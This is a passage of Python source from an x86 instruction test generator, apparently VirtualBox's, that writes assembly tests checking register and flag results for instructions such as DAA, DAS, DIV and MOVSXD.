def isApplicable(self, oGen):
return not oGen.oTarget.is64Bit();
def generateTest(self, oGen, sTestFnName):
if self.fIsDas: from itgTableDas import g_aItgDasResults as aItgResults;
else: from itgTableDaa import g_aItgDaaResults as aItgResults;
cMax = len(aItgResults);
if oGen.isTiny():
cMax = 64;
oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
oGen.write(' xor ebx, ebx\n');
oGen.write('.das_loop:\n');
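# The loop counter ebx doubles as the test vector: judging from the code below,
# bit 0 is the input CF, bit 1 the input AF and bits 2-9 the input AL, which is
# also how the imported itgTableDaa/itgTableDas result tables are indexed.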
# Save the loop variable so we can load known values.
oGen.write(' push ebx\n');
oGen.newSubTestEx('ebx');
# Push the results.
oGen.write(' movzx eax, byte [.abAlResults + ebx]\n');
oGen.write(' or eax, %#x\n' % (oGen.au32Regs[X86_GREG_xAX] & ~0xff,));
oGen.write(' push eax\n');
oGen.write(' movzx eax, byte [.aFlagsResults + ebx]\n');
oGen.write(' push eax\n');
# Calc and push the inputs.
oGen.write(' mov eax, ebx\n');
oGen.write(' shr eax, 2\n');
oGen.write(' and eax, 0ffh\n');
oGen.write(' or eax, %#x\n' % (oGen.au32Regs[X86_GREG_xAX] & ~0xff,));
oGen.write(' push eax\n');
oGen.write(' pushfd\n')
oGen.write(' and dword [xSP], ~(X86_EFL_CF | X86_EFL_AF)\n');
oGen.write(' mov al, bl\n');
oGen.write(' and al, 2\n');
oGen.write(' shl al, X86_EFL_AF_BIT - 1\n');
oGen.write(' or [xSP], al\n');
oGen.write(' mov al, bl\n');
oGen.write(' and al, X86_EFL_CF\n');
oGen.write(' or [xSP], al\n');
# Load register values and do the test.
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' popfd\n');
oGen.write(' pop eax\n');
if self.fIsDas:
oGen.write(' das\n');
else:
oGen.write(' daa\n');
# Verify the results.
fFlagsToCheck = X86_EFL_CF | X86_EFL_PF | X86_EFL_AF | X86_EFL_SF | X86_EFL_ZF;
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needFlagsGRegChecker(fFlagsToCheck, X86_GREG_xAX),));
# Restore the loop variable and advance.
oGen.write(' pop ebx\n');
oGen.write(' inc ebx\n');
oGen.write(' cmp ebx, %#x\n' % (cMax,));
oGen.write(' jb .das_loop\n');
oGen.write(' ret\n');
oGen.write('.abAlResults:\n');
for i in range(cMax):
oGen.write(' db %#x\n' % (aItgResults[i][0],));
oGen.write('.aFlagsResults:\n');
for i in range(cMax):
oGen.write(' db %#x\n' % (aItgResults[i][1],));
oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
return True;
##
# Instruction Tests.
#
g_aoInstructionTests = [
InstrTest_Mov_Gv_Ev(),
InstrTest_MovSxD_Gv_Ev(),
InstrTest_DivIDiv(fIsIDiv = False),
InstrTest_DivIDiv(fIsIDiv = True),
InstrTest_DaaDas(fIsDas = False),
InstrTest_DaaDas(fIsDas = True),
];
class InstructionTestGen(object): # pylint: disable=R0902
"""
Instruction Test Generator.
"""
## @name Test size
## @{
ksTestSize_Large = 'large';
ksTestSize_Medium = 'medium';
ksTestSize_Tiny = 'tiny';
## @}
kasTestSizes = ( ksTestSize_Large, ksTestSize_Medium, ksTestSize_Tiny );
## The prefix for the checker functions.
ksCheckerPrefix = 'Common_Check_'
def __init__(self, oOptions):
self.oOptions = oOptions;
self.oTarget = g_dTargetEnvs[oOptions.sTargetEnv];
# Calculate the number of output files.
self.cFiles = 1;
if len(g_aoInstructionTests) > self.oOptions.cInstrPerFile:
self.cFiles = len(g_aoInstructionTests) / self.oOptions.cInstrPerFile;
if self.cFiles * self.oOptions.cInstrPerFile < len(g_aoInstructionTests):
self.cFiles += 1;
# Fix the known register values.
self.au64Regs = randUxxList(64, 16);
self.au32Regs = [(self.au64Regs[i] & UINT32_MAX) for i in range(8)];
self.au16Regs = [(self.au64Regs[i] & UINT16_MAX) for i in range(8)];
self.auRegValues = self.au64Regs if self.oTarget.is64Bit() else self.au32Regs;
# Declare state variables used while generating.
self.oFile = sys.stderr;
self.iFile = -1;
self.sFile = '';
self._dCheckFns = dict();
self._dMemSetupFns = dict();
self._d64BitConsts = dict();
# State variables used while generating tests, conveniently placed here (lazy bird)...
self.iModReg = 0;
self.iModRm = 0;
self.iSibBaseReg = 0;
self.iSibIndexReg = 0;
self.iSibScale = 1;
if self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
self._oModRegRange = range(2);
self._oModRegRange8 = range(2);
self.oModRmRange = range(2);
self.cSibBasePerRun = 1;
self._cSibIndexPerRun = 2;
self.oSibScaleRange = range(1);
elif self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
self._oModRegRange = range( 5 if self.oTarget.is64Bit() else 4);
self._oModRegRange8 = range( 6 if self.oTarget.is64Bit() else 4);
self.oModRmRange = range(5);
self.cSibBasePerRun = 5;
self._cSibIndexPerRun = 4
self.oSibScaleRange = range(2);
else:
self._oModRegRange = range(16 if self.oTarget.is64Bit() else 8);
self._oModRegRange8 = range(20 if self.oTarget.is64Bit() else 8);
self.oModRmRange = range(16 if self.oTarget.is64Bit() else 8);
self.cSibBasePerRun = 8;
self._cSibIndexPerRun = 9;
self.oSibScaleRange = range(4);
self.iSibIndexRange = 0;
#
# Methods used by instruction tests.
#
def write(self, sText):
""" Writes to the current output file. """
return self.oFile.write(unicode(sText));
def writeln(self, sText):
""" Writes a line to the current output file. """
self.write(sText);
return self.write('\n');
def writeInstrBytes(self, abInstr):
"""
Emits an instruction given as a sequence of byte values.
"""
self.write(' db %#04x' % (abInstr[0],));
for i in range(1, len(abInstr)):
self.write(', %#04x' % (abInstr[i],));
return self.write('\n');
def newSubTest(self):
"""
Indicates that a new subtest has started.
"""
self.write(' mov dword [VBINSTST_NAME(g_uVBInsTstSubTestIndicator) xWrtRIP], __LINE__\n');
return True;
def newSubTestEx(self, sIndicator):
"""
Indicates that a new subtest has started.
"""
self.write(' mov dword [VBINSTST_NAME(g_uVBInsTstSubTestIndicator) xWrtRIP], %s\n' % (sIndicator, ));
return True;
def needGRegChecker(self, iReg1, iReg2 = None, iReg3 = None):
"""
Records the need for a given register checker function, returning its label.
"""
if iReg2 is not None:
if iReg3 is not None:
sName = '%s_%s_%s' % (self.oTarget.asGRegs[iReg1], self.oTarget.asGRegs[iReg2], self.oTarget.asGRegs[iReg3],);
else:
sName = '%s_%s' % (self.oTarget.asGRegs[iReg1], self.oTarget.asGRegs[iReg2],);
else:
sName = '%s' % (self.oTarget.asGRegs[iReg1],);
assert iReg3 is None;
if sName in self._dCheckFns:
self._dCheckFns[sName] += 1;
else:
self._dCheckFns[sName] = 1;
return self.ksCheckerPrefix + sName;
def needFlagsGRegChecker(self, fFlagsToCheck, iReg1, iReg2 = None, iReg3 = None):
"""
Records the need for a given rFLAGS + register checker function, returning its label.
"""
sWorkerName = self.needGRegChecker(iReg1, iReg2, iReg3);
sName = 'eflags_%#x_%s' % (fFlagsToCheck, sWorkerName[len(self.ksCheckerPrefix):]);
if sName in self._dCheckFns:
self._dCheckFns[sName] += 1;
else:
self._dCheckFns[sName] = 1;
return self.ksCheckerPrefix + sName;
def needGRegMemSetup(self, cAddrBits, cbEffOp, iBaseReg = None, offDisp = None, iIndexReg = None, iScale = 1):
"""
Records the need for a given memory setup function, returning its label.
"""
assert cAddrBits in [64, 32, 16];
assert cbEffOp in [8, 4, 2, 1];
assert iScale in [1, 2, 4, 8];
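# The generated label encodes the whole addressing form, e.g. (illustrative)
# 'Common_MemSetup_32bit_U8_eax_x2_ecx_0x00000100' for an 8-bit access at
# [eax + ecx*2 + 0x100]; _generateMemSetupFunctions() parses it back apart.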
sName = '%ubit_U%u' % (cAddrBits, cbEffOp * 8,);
if iBaseReg is not None:
sName += '_%s' % (gregName(iBaseReg, cAddrBits),);
sName += '_x%u' % (iScale,);
if iIndexReg is not None:
sName += '_%s' % (gregName(iIndexReg, cAddrBits),);
if offDisp is not None:
sName += '_%#010x' % (offDisp & UINT32_MAX, );
if sName in self._dMemSetupFns:
self._dMemSetupFns[sName] += 1;
else:
self._dMemSetupFns[sName] = 1;
return 'Common_MemSetup_' + sName;
def need64BitConstant(self, uVal):
"""
Records the need for a 64-bit constant, returning its label.
These constants are pooled in an attempt to reduce the size of the whole thing.
"""
assert uVal >= 0 and uVal <= UINT64_MAX;
if uVal in self._d64BitConsts:
self._d64BitConsts[uVal] += 1;
else:
self._d64BitConsts[uVal] = 1;
return 'g_u64Const_0x%016x' % (uVal, );
def pushConst(self, uResult):
"""
Emits a push of a constant value, taking care of high values on 64-bit hosts.
"""
if self.oTarget.is64Bit() and uResult >= 0x80000000:
self.write(' push qword [%s wrt rip]\n' % (self.need64BitConstant(uResult),));
else:
self.write(' push dword 0x%x\n' % (uResult,));
return True;
def getDispForMod(self, iMod, cbAlignment = 1):
"""
Get a set of address displacements for a given addressing mode.
The alignment restriction is for SIB scaling.
"""
assert cbAlignment in [1, 2, 4, 8];
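# The values below are the extremes of the signed byte (mod=1) and dword (mod=2)
# displacements; the positive one is rounded down to the requested alignment so
# that SIB-scaled accesses stay naturally aligned.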
if iMod == 0:
aoffDisp = [ None, ];
elif iMod == 1:
aoffDisp = [ 127 & ~(cbAlignment - 1), -128 ];
elif iMod == 2:
aoffDisp = [ 2147483647 & ~(cbAlignment - 1), -2147483648 ];
else: assert False;
return aoffDisp;
def getModRegRange(self, cbEffOp):
"""
The Mod R/M register range varies with the effective operand size; for
8-bit registers we have 4 more.
"""
if cbEffOp == 1:
return self._oModRegRange8;
return self._oModRegRange;
def getSibIndexPerRun(self):
"""
We vary the SIB index test range a little to try to cover more operand
combinations and avoid repeating the same ones.
"""
self.iSibIndexRange += 1;
self.iSibIndexRange %= 3;
if self.iSibIndexRange == 0:
return self._cSibIndexPerRun - 1;
return self._cSibIndexPerRun;
def isTiny(self):
""" Checks if we're in tiny mode."""
return self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny;
def isMedium(self):
""" Checks if we're in medium mode."""
return self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium;
#
# Forwarding calls to oTarget to shorten typing and lessen the attacks
# on the right margin.
#
def gregNameBits(self, iReg, cBitsWide):
""" Target: Get the name of a general register for the given size (in bits). """
return self.oTarget.gregNameBits(iReg, cBitsWide);
def gregNameBytes(self, iReg, cbWide):
""" Target: Get the name of a general register for the given size (in bytes). """
return self.oTarget.gregNameBytes(iReg, cbWide);
def is64Bit(self):
""" Target: Is the target 64-bit? """
return self.oTarget.is64Bit();
#
# Internal machinery.
#
def _randInitIndexes(self):
"""
Initializes the Mod R/M and SIB state index with random numbers prior
to generating a test.
Note! As with all other randomness and variations we do, we cannot
test all combinations for each and every instruction so we try to
get coverage over time.
"""
self.iModReg = randU8();
self.iModRm = randU8();
self.iSibBaseReg = randU8();
self.iSibIndexReg = randU8();
self.iSibScale = 1 << (randU8() & 3);
self.iSibIndexRange = randU8();
return True;
def _calcTestFunctionName(self, oInstrTest, iInstrTest):
"""
Calc a test function name for the given instruction test.
"""
sName = 'TestInstr%03u_%s' % (iInstrTest, oInstrTest.sName);
return sName.replace(',', '_').replace(' ', '_').replace('%', '_');
def _generateFileHeader(self, ):
"""
Writes the file header.
Raises exception on trouble.
"""
self.write('; $Id: InstructionTestGen.py $\n'
';; @file %s\n'
'; Autogenerated by %s %s. DO NOT EDIT\n'
';\n'
'\n'
';\n'
'; Headers\n'
';\n'
'%%include "env-%s.mac"\n'
% ( os.path.basename(self.sFile),
os.path.basename(__file__), __version__[11:-1],
self.oTarget.sName,
) );
# Target environment specific init stuff.
#
# Global variables.
#
self.write('\n\n'
';\n'
'; Globals\n'
';\n');
self.write('VBINSTST_BEGINDATA\n'
'VBINSTST_GLOBALNAME_EX g_pvLow16Mem4K, data hidden\n'
' dq 0\n'
'VBINSTST_GLOBALNAME_EX g_pvLow32Mem4K, data hidden\n'
' dq 0\n'
'VBINSTST_GLOBALNAME_EX g_pvMem4K, data hidden\n'
' dq 0\n'
'VBINSTST_GLOBALNAME_EX g_uVBInsTstSubTestIndicator, data hidden\n'
' dd 0\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
'VBINSTST_TRAP_RECS_BEGIN\n'
'%endif\n'
'VBINSTST_BEGINCODE\n'
);
self.write('%ifdef RT_ARCH_AMD64\n');
for i in range(len(g_asGRegs64)):
self.write('g_u64KnownValue_%s: dq 0x%x\n' % (g_asGRegs64[i], self.au64Regs[i]));
self.write('%endif\n\n')
#
# Common functions.
#
# Loading common values.
self.write('\n\n'
'VBINSTST_BEGINPROC Common_LoadKnownValues\n'
'%ifdef RT_ARCH_AMD64\n');
for i in range(len(g_asGRegs64NoSp)):
if g_asGRegs64NoSp[i]:
self.write(' mov %s, 0x%x\n' % (g_asGRegs64NoSp[i], self.au64Regs[i],));
self.write('%else\n');
for i in range(8):
if g_asGRegs32NoSp[i]:
self.write(' mov %s, 0x%x\n' % (g_asGRegs32NoSp[i], self.au32Regs[i],));
self.write('%endif\n'
' ret\n'
'VBINSTST_ENDPROC Common_LoadKnownValues\n'
'\n');
self.write('VBINSTST_BEGINPROC Common_CheckKnownValues\n'
'%ifdef RT_ARCH_AMD64\n');
for i in range(len(g_asGRegs64NoSp)):
if g_asGRegs64NoSp[i]:
self.write(' cmp %s, [g_u64KnownValue_%s wrt rip]\n'
' je .ok_%u\n'
' push %u ; register number\n'
' push %s ; actual\n'
' push qword [g_u64KnownValue_%s wrt rip] ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n'
'.ok_%u:\n'
% ( g_asGRegs64NoSp[i], g_asGRegs64NoSp[i], i, i, g_asGRegs64NoSp[i], g_asGRegs64NoSp[i], i,));
self.write('%else\n');
for i in range(8):
if g_asGRegs32NoSp[i]:
self.write(' cmp %s, 0x%x\n'
' je .ok_%u\n'
' push %u ; register number\n'
' push %s ; actual\n'
' push dword 0x%x ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n'
'.ok_%u:\n'
% ( g_asGRegs32NoSp[i], self.au32Regs[i], i, i, g_asGRegs32NoSp[i], self.au32Regs[i], i,));
self.write('%endif\n'
' ret\n'
'VBINSTST_ENDPROC Common_CheckKnownValues\n'
'\n');
return True;
def _generateMemSetupFunctions(self): # pylint: disable=R0915
"""
Generates the memory setup functions.
"""
cDefAddrBits = self.oTarget.getDefAddrBits();
for sName in self._dMemSetupFns:
# Unpack it.
asParams = sName.split('_');
cAddrBits = int(asParams[0][:-3]); assert asParams[0][-3:] == 'bit';
cEffOpBits = int(asParams[1][1:]); assert asParams[1][0] == 'U';
if cAddrBits == 64: asAddrGRegs = g_asGRegs64;
elif cAddrBits == 32: asAddrGRegs = g_asGRegs32;
else: asAddrGRegs = g_asGRegs16;
i = 2;
iBaseReg = None;
sBaseReg = None;
if i < len(asParams) and asParams[i] in asAddrGRegs:
sBaseReg = asParams[i];
iBaseReg = asAddrGRegs.index(sBaseReg);
i += 1
assert i < len(asParams); assert asParams[i][0] == 'x';
iScale = int(asParams[i][1:]); assert iScale in [1, 2, 4, 8], '%u %s' % (iScale, sName);
i += 1;
sIndexReg = None;
iIndexReg = None;
if i < len(asParams) and asParams[i] in asAddrGRegs:
sIndexReg = asParams[i];
iIndexReg = asAddrGRegs.index(sIndexReg);
i += 1;
u32Disp = None;
if i < len(asParams) and len(asParams[i]) == 10:
u32Disp = long(asParams[i], 16);
i += 1;
assert i == len(asParams), 'i=%d len=%d len[i]=%d (%s)' % (i, len(asParams), len(asParams[i]), asParams[i],);
assert iScale == 1 or iIndexReg is not None;
# Find a temporary register.
iTmpReg1 = X86_GREG_xCX;
while iTmpReg1 in [iBaseReg, iIndexReg]:
iTmpReg1 += 1;
# Prologue.
self.write('\n\n'
'; cAddrBits=%s cEffOpBits=%s iBaseReg=%s u32Disp=%s iIndexReg=%s iScale=%s\n'
'VBINSTST_BEGINPROC Common_MemSetup_%s\n'
' MY_PUSH_FLAGS\n'
' push %s\n'
% ( cAddrBits, cEffOpBits, iBaseReg, u32Disp, iIndexReg, iScale,
sName, self.oTarget.asGRegs[iTmpReg1], ));
# Figure out what to use.
if cEffOpBits == 64:
sTmpReg1 = g_asGRegs64[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u64Data)';
elif cEffOpBits == 32:
sTmpReg1 = g_asGRegs32[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u32Data)';
elif cEffOpBits == 16:
sTmpReg1 = g_asGRegs16[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u16Data)';
else:
assert cEffOpBits == 8; assert iTmpReg1 < 4;
sTmpReg1 = g_asGRegs8Rex[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u8Data)';
# Special case: reg + reg * [2,4,8]
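# (With base == index the CPU computes reg*(iScale+1) + disp, so the code below
# appears to divide the target address by iScale+1, use the quotient as the
# register value and shave the remainder off the address it stores the value at.)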
if iBaseReg == iIndexReg and iBaseReg is not None and iScale != 1:
iTmpReg2 = X86_GREG_xBP;
while iTmpReg2 in [iBaseReg, iIndexReg, iTmpReg1]:
iTmpReg2 += 1;
sTmpReg2 = self.gregNameBits(iTmpReg2, cAddrBits);
self.write(' push sAX\n'
' push %s\n'
' push sDX\n'
% (self.oTarget.asGRegs[iTmpReg2],));
if cAddrBits == 16:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow16Mem4K) xWrtRIP]\n' % (sTmpReg2,));
else:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow32Mem4K) xWrtRIP]\n' % (sTmpReg2,));
self.write(' add %s, 0x200\n' % (sTmpReg2,));
self.write(' mov %s, %s\n' % (self.gregNameBits(X86_GREG_xAX, cAddrBits), sTmpReg2,));
if u32Disp is not None:
self.write(' sub %s, %d\n'
% ( self.gregNameBits(X86_GREG_xAX, cAddrBits), convU32ToSigned(u32Disp), ));
self.write(' xor edx, edx\n'
'%if xCB == 2\n'
' push 0\n'
'%endif\n');
self.write(' push %u\n' % (iScale + 1,));
self.write(' div %s [xSP]\n' % ('qword' if cAddrBits == 64 else 'dword',));
self.write(' sub %s, %s\n' % (sTmpReg2, self.gregNameBits(X86_GREG_xDX, cAddrBits),));
self.write(' pop sDX\n'
' pop sDX\n'); # sTmpReg2 is eff address; sAX is sIndexReg value.
# Note! sTmpReg1 can be xDX and that's no problem now.
self.write(' mov %s, [xSP + sCB*3 + MY_PUSH_FLAGS_SIZE + xCB]\n' % (sTmpReg1,));
self.write(' mov [%s], %s\n' % (sTmpReg2, sTmpReg1,)); # Value in place.
self.write(' pop %s\n' % (self.oTarget.asGRegs[iTmpReg2],));
if iBaseReg == X86_GREG_xAX:
self.write(' pop %s\n' % (self.oTarget.asGRegs[iTmpReg1],));
else:
self.write(' mov %s, %s\n' % (sBaseReg, self.gregNameBits(X86_GREG_xAX, cAddrBits),));
self.write(' pop sAX\n');
else:
# Load the value and mem address, storing the value there.
# Note! ASSUMES that the scale and displacement work fine together.
sAddrReg = sBaseReg if sBaseReg is not None else sIndexReg;
self.write(' mov %s, [xSP + sCB + MY_PUSH_FLAGS_SIZE + xCB]\n' % (sTmpReg1,));
if cAddrBits >= cDefAddrBits:
self.write(' mov [%s xWrtRIP], %s\n' % (sDataVar, sTmpReg1,));
self.write(' lea %s, [%s xWrtRIP]\n' % (sAddrReg, sDataVar,));
else:
if cAddrBits == 16:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow16Mem4K) xWrtRIP]\n' % (sAddrReg,));
else:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow32Mem4K) xWrtRIP]\n' % (sAddrReg,));
self.write(' add %s, %s\n' % (sAddrReg, (randU16() << cEffOpBits) & 0xfff, ));
self.write(' mov [%s], %s\n' % (sAddrReg, sTmpReg1, ));
# Adjust for displacement and scaling.
if u32Disp is not None:
self.write(' sub %s, %d\n' % ( sAddrReg, convU32ToSigned(u32Disp), ));
if iIndexReg is not None:
if iBaseReg == iIndexReg:
assert iScale == 1;
assert u32Disp is None or (u32Disp & 1) == 0;
self.write(' shr %s, 1\n' % (sIndexReg,));
elif sBaseReg is not None:
uIdxRegVal = randUxx(cAddrBits);
if cAddrBits == 64:
self.write(' mov %s, %u\n'
' sub %s, %s\n'
' mov %s, %u\n'
% ( sIndexReg, (uIdxRegVal * iScale) & UINT64_MAX,
sBaseReg, sIndexReg,
sIndexReg, uIdxRegVal, ));
else:
assert cAddrBits == 32;
self.write(' mov %s, %u\n'
' sub %s, %#06x\n'
% ( sIndexReg, uIdxRegVal, sBaseReg, (uIdxRegVal * iScale) & UINT32_MAX, ));
elif iScale == 2:
assert u32Disp is None or (u32Disp & 1) == 0;
self.write(' shr %s, 1\n' % (sIndexReg,));
elif iScale == 4:
assert u32Disp is None or (u32Disp & 3) == 0;
self.write(' shr %s, 2\n' % (sIndexReg,));
elif iScale == 8:
assert u32Disp is None or (u32Disp & 7) == 0;
self.write(' shr %s, 3\n' % (sIndexReg,));
else:
assert iScale == 1;
# Set upper bits that's supposed to be unused.
if cDefAddrBits > cAddrBits or cAddrBits == 16:
if cDefAddrBits == 64:
assert cAddrBits == 32;
if iBaseReg is not None:
self.write(' mov %s, %#018x\n'
' or %s, %s\n'
% ( g_asGRegs64[iTmpReg1], randU64() & 0xffffffff00000000,
g_asGRegs64[iBaseReg], g_asGRegs64[iTmpReg1],));
if iIndexReg is not None and iIndexReg != iBaseReg:
self.write(' mov %s, %#018x\n'
' or %s, %s\n'
% ( g_asGRegs64[iTmpReg1], randU64() & 0xffffffff00000000,
g_asGRegs64[iIndexReg], g_asGRegs64[iTmpReg1],));
else:
assert cDefAddrBits == 32; assert cAddrBits == 16; assert iIndexReg is None;
if iBaseReg is not None:
self.write(' or %s, %#010x\n'
% ( g_asGRegs32[iBaseReg], randU32() & 0xffff0000, ));
# Epilogue.
self.write(' pop %s\n'
' MY_POP_FLAGS\n'
' ret sCB\n'
'VBINSTST_ENDPROC Common_MemSetup_%s\n'
% ( self.oTarget.asGRegs[iTmpReg1], sName,));
def _generateFileFooter(self):
"""
Generates file footer.
"""
# Terminate the trap records.
self.write('\n\n'
';\n'
'; Terminate the trap records\n'
';\n'
'VBINSTST_BEGINDATA\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
'VBINSTST_TRAP_RECS_END\n'
'%endif\n'
'VBINSTST_BEGINCODE\n');
# Register checking functions.
for sName in self._dCheckFns:
asRegs = sName.split('_');
sPushSize = 'dword';
# Do we check eflags first.
if asRegs[0] == 'eflags':
asRegs.pop(0);
sFlagsToCheck = asRegs.pop(0);
self.write('\n\n'
'; Check flags and then defers to the register-only checker\n'
'; To save space, the callee cleans up the stack.\n'
'; Ref count: %u\n'
'VBINSTST_BEGINPROC %s%s\n'
' MY_PUSH_FLAGS\n'
' push sAX\n'
' mov sAX, [xSP + sCB]\n'
' and sAX, %s\n'
' cmp sAX, [xSP + xCB + sCB*2]\n'
' je .equal\n'
% ( self._dCheckFns[sName], self.ksCheckerPrefix, sName,
sFlagsToCheck,));
self.write(' push dword 0xef ; register number\n'
' push sAX ; actual\n'
' mov sAX, [xSP + xCB + sCB*4]\n'
' push sAX ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n');
self.write('.equal:\n'
' mov xAX, [xSP + sCB*2]\n' # Remove the expected eflags value from the stack frame.
' mov [xSP + sCB*2 + xCB + sCB - xCB], xAX\n'
' pop sAX\n'
' MY_POP_FLAGS\n'
' lea xSP, [xSP + sCB]\n'
' jmp VBINSTST_NAME(Common_Check_%s)\n'
'VBINSTST_ENDPROC %s%s\n'
% ( '_'.join(asRegs),
self.ksCheckerPrefix, sName,) );
else:
# Prologue
self.write('\n\n'
'; Checks 1 or more register values, expected values pushed on the stack.\n'
'; To save space, the callee cleans up the stack.\n'
'; Ref count: %u\n'
'VBINSTST_BEGINPROC %s%s\n'
' MY_PUSH_FLAGS\n'
% ( self._dCheckFns[sName], self.ksCheckerPrefix, sName, ) );
# Register checks.
for i in range(len(asRegs)):
sReg = asRegs[i];
iReg = self.oTarget.asGRegs.index(sReg);
if i == asRegs.index(sReg): # Only check once, i.e. input = output reg.
self.write(' cmp %s, [xSP + MY_PUSH_FLAGS_SIZE + xCB + sCB * %u]\n'
' je .equal%u\n'
' push %s %u ; register number\n'
' push %s ; actual\n'
' mov %s, [xSP + sCB*2 + MY_PUSH_FLAGS_SIZE + xCB + sCB * %u]\n'
' push %s ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n'
'.equal%u:\n'
% ( sReg, i, i, sPushSize, iReg, sReg, sReg, i, sReg, i, ) );
# Restore known register values and check the other registers.
for sReg in asRegs:
if self.oTarget.is64Bit():
self.write(' mov %s, [g_u64KnownValue_%s wrt rip]\n' % (sReg, sReg,));
else:
iReg = self.oTarget.asGRegs.index(sReg)
self.write(' mov %s, 0x%x\n' % (sReg, self.au32Regs[iReg],));
self.write(' MY_POP_FLAGS\n'
' call VBINSTST_NAME(Common_CheckKnownValues)\n'
' ret sCB*%u\n'
'VBINSTST_ENDPROC %s%s\n'
% (len(asRegs), self.ksCheckerPrefix, sName,));
# memory setup functions
self._generateMemSetupFunctions();
# 64-bit constants.
if len(self._d64BitConsts) > 0:
self.write('\n\n'
';\n'
'; 64-bit constants\n'
';\n');
for uVal in self._d64BitConsts:
self.write('g_u64Const_0x%016x: dq 0x%016x ; Ref count: %d\n' % (uVal, uVal, self._d64BitConsts[uVal], ) );
return True;
def _generateTests(self):
"""
Generate the test cases.
"""
for self.iFile in range(self.cFiles):
if self.cFiles == 1:
self.sFile = '%s.asm' % (self.oOptions.sOutputBase,)
else:
self.sFile = '%s-%u.asm' % (self.oOptions.sOutputBase, self.iFile)
self.oFile = sys.stdout;
if self.oOptions.sOutputBase != '-':
self.oFile = io.open(self.sFile, 'w', buffering = 65536, encoding = 'utf-8');
self._generateFileHeader();
# Calc the range.
iInstrTestStart = self.iFile * self.oOptions.cInstrPerFile;
iInstrTestEnd = iInstrTestStart + self.oOptions.cInstrPerFile;
if iInstrTestEnd > len(g_aoInstructionTests):
iInstrTestEnd = len(g_aoInstructionTests);
# Generate the instruction tests.
for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
oInstrTest = g_aoInstructionTests[iInstrTest];
if oInstrTest.isApplicable(self):
self.write('\n'
'\n'
';\n'
'; %s\n'
';\n'
% (oInstrTest.sName,));
self._randInitIndexes();
oInstrTest.generateTest(self, self._calcTestFunctionName(oInstrTest, iInstrTest));
# Generate the main function.
self.write('\n\n'
'VBINSTST_BEGINPROC TestInstrMain\n'
' MY_PUSH_ALL\n'
' sub xSP, 40h\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
' VBINSTST_TRAP_RECS_INSTALL\n'
'%endif\n'
'\n');
for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
oInstrTest = g_aoInstructionTests[iInstrTest];
if oInstrTest.isApplicable(self):
self.write('%%ifdef ASM_CALL64_GCC\n'
' lea rdi, [.szInstr%03u wrt rip]\n'
'%%elifdef ASM_CALL64_MSC\n'
' lea rcx, [.szInstr%03u wrt rip]\n'
'%%else\n'
' mov xAX, .szInstr%03u\n'
' mov [xSP], xAX\n'
'%%endif\n'
' VBINSTST_CALL_FN_SUB_TEST\n'
' call VBINSTST_NAME(%s)\n'
% ( iInstrTest, iInstrTest, iInstrTest, self._calcTestFunctionName(oInstrTest, iInstrTest)));
self.write('\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
' VBINSTST_TRAP_RECS_UNINSTALL\n'
'%endif\n'
' add xSP, 40h\n'
' MY_POP_ALL\n'
' ret\n\n');
for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
self.write('.szInstr%03u: db \'%s\', 0\n' % (iInstrTest, g_aoInstructionTests[iInstrTest].sName,));
self.write('VBINSTST_ENDPROC TestInstrMain\n\n');
self._generateFileFooter();
if self.oOptions.sOutputBase != '-':
self.oFile.close();
self.oFile = None;
self.sFile = '';
return RTEXITCODE_SUCCESS;
def _runMakefileMode(self):
"""
Generate a list of output files on standard output.
"""
if self.cFiles == 1:
print('%s.asm' % (self.oOptions.sOutputBase,));
else:
print(' '.join('%s-%s.asm' % (self.oOptions.sOutputBase, i) for i in range(self.cFiles)));
return RTEXITCODE_SUCCESS;
def run(self):
"""
Generates the tests or whatever is required.
"""
if self.oOptions.fMakefileMode:
return self._runMakefileMode();
sys.stderr.write('InstructionTestGen.py: Seed = %s\n' % (g_iMyRandSeed,));
return self._generateTests();
@staticmethod
def main():
"""
Main function a la C/C++. Returns exit code.
"""
#
# Parse the command line.
#
oParser = OptionParser(version = __version__[11:-1].strip());
oParser.add_option('--makefile-mode', dest = 'fMakefileMode', action = 'store_true', default = False,
help = 'Special mode for use to output a list of output files for the benefit of '
'the make program (kmk).');
oParser.add_option('--split', dest = 'cInstrPerFile', metavar = '<instr-per-file>', type = 'int', default = 9999999,
help = 'Number of instructions to test per output file.');
oParser.add_option('--output-base', dest = 'sOutputBase', metavar = '<file>', default = None,
help = 'The output file base name, no suffix please. Required.');
oParser.add_option('--target', dest = 'sTargetEnv', metavar = '<target>',
default = 'iprt-r3-32',
choices = g_dTargetEnvs.keys(),
help = 'The target environment. Choices: %s'
% (', '.join(sorted(g_dTargetEnvs.keys())),));
oParser.add_option('--test-size', dest = 'sTestSize', default = InstructionTestGen.ksTestSize_Medium,
choices = InstructionTestGen.kasTestSizes,
help = 'Selects the test size.');
(oOptions, asArgs) = oParser.parse_args();
if len(asArgs) > 0:
oParser.print_help();
return RTEXITCODE_SYNTAX
if oOptions.sOutputBase is None:
print('syntax error: Missing required option --output-base.', file = sys.stderr);
return RTEXITCODE_SYNTAX
#
# Instantiate the program class and run it.
#
oProgram = InstructionTestGen(oOptions);
return oProgram.run();
